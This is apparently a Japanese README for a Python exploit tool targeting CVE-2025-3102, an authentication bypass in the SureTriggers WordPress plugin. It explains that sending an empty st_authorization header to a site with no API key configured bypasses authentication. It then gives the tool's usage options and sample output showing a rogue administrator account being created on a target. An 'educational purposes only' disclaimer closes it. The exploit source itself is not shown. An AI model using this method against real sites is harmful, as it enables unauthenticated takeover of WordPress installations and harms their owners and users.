
WordPress SureTriggers <= 1.0.78 - 空値チェックの欠落による認証バイパスで、未認証での管理者ユーザー作成が可能
🚨 CVE-2025-3102 は、SureTriggers: All-in-One Automation Platform WordPress プラグインに影響する重大な認証バイパス脆弱性であり、100,000以上のウェブサイトでアクティブにインストールされています。この脆弱性の性質と展開規模により、重大なセキュリティリスクをもたらします。
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HWordPress 用 SureTriggers プラグインは、未認証の攻撃者が管理者アカウントを作成できるようにする認証バイパスに対して脆弱です。これは、autheticate_user 関数内の secret_key に対する空値チェックの欠如によるものです。
プラグインがインストールされ有効化されているがAPIキーが設定されていない場合、攻撃者は空の st_authorization ヘッダーを送信することで認証をバイパスし、認証済みユーザー専用のアクションをトリガーできます。
この脆弱性の悪用を自動化する Python スクリプトが提供されています。
このスクリプトを使用すると、脆弱なサイトに新しい管理者ユーザーを生成できます。
readme.txt によるプラグインバージョンの自動検出st_authorization ヘッダーを使用した認証バイパスusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
このスクリプトは教育目的のみで提供されています。
明示的な許可なくターゲットに対してこのコードを使用することは違法です。
著者は、誤用または引き起こされた損害について一切の責任を負いません。
作成者: rHz0d